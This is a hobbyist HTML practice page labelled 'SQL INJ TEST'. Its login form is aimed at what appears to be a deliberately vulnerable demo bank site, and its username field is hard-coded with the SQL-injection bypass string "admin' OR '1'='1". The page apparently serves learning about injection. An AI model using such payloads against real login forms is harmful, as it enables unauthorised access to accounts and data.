<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>sign up</title>
    <style>
        div.to{
            text-align: center;
            size: 50px;
            text-size-adjust: 60;
        }
        h3{
            text-align: center;
            text-size-adjust: 50;
            border-style: double;
        }
        div.do{
            text-align: center;
        }
        div.xo{
            text-align: center;
            
        }
        div.roob{
            display: block;
            width: 100;
            height: 100;
        }
     body{
        border-style: double;
            border-color: chartreuse;
            font-size: x-large;
            text-align: center;
     }
     div.hello{
        text-align: left;
        font-size: medium;
     }
     div.databases{
        text-align: start;
        font-size: medium;
     }
     div.go{
        font-size: medium;
        text-align: right;
     }
     h2{
        font-size: xx-large;
        text-align: center;
     }
    </style>
</head>
<body>
    <div class="hello">
    <li><a href="https://www.google.com/">google</a></li>
    <br>
    <li><a href="http://altoromutual.com/login.jsp" target="_blank">More of Sql injection</a></li>
    <br>
    <li><a href="">Find help</a></li>
    <br>
    <li><a href="walidkh@gmail.com">Contact us email: walidkh@gmail.com</a></li>
    <br>
    <li><a href="">bACK</a></li>
    <br>
</div>

<div class="databases">
    <input type="search" placeholder="Search">
</div>
</div>
    <div class="roob">
            <img src="https://th.bing.com/th/id/R.282a67879fc5ea7c8ad1dacff35d989a?rik=as6hKhaHMLfAag&riu=http%3a%2f%2f3.bp.blogspot.com%2f-zMjjqVr0sqM%2fUnQFg5uUzFI%2fAAAAAAAAArY%2f2H14YJ8RTUU%2fs1600%2fsql_injection.gif&ehk=BnWxuOZo6VgJXTHeoy1Ljb8R%2fFmhw0EmJwyedEYn0uA%3d&risl=&pid=ImgRaw&r=0" alt="">
    </div>
        <H3>Signup</H3>
    <div class="to">
        <form action="http://altoromutual.com/login.jsp" method="post">
           <h2>SQL INJ TEST</h2>        
            <label for="walid">Username:</label>
            <input id="walid" type="text" value="admin' OR '1'='1" readonly placeholder="Username" autofocus required >
    
    <br>
    <br>
            <label for="walida">Password:</label>
            <input id="walida" type="password" placeholder="Password" minlength="6" maxlength="16" required >
        

    <br>
    <br>
        <!--<input type="submit" value="Save" >-->
        <button >Save</button>
    <br>
</form>
</div>
    <p>SQL Injection</p>
    <textarea name="make what you do" id="" cols="300" rows="10" minlength="1" maxlength="2" placeholder="LOL"></textarea>
</div>
</body>
</html>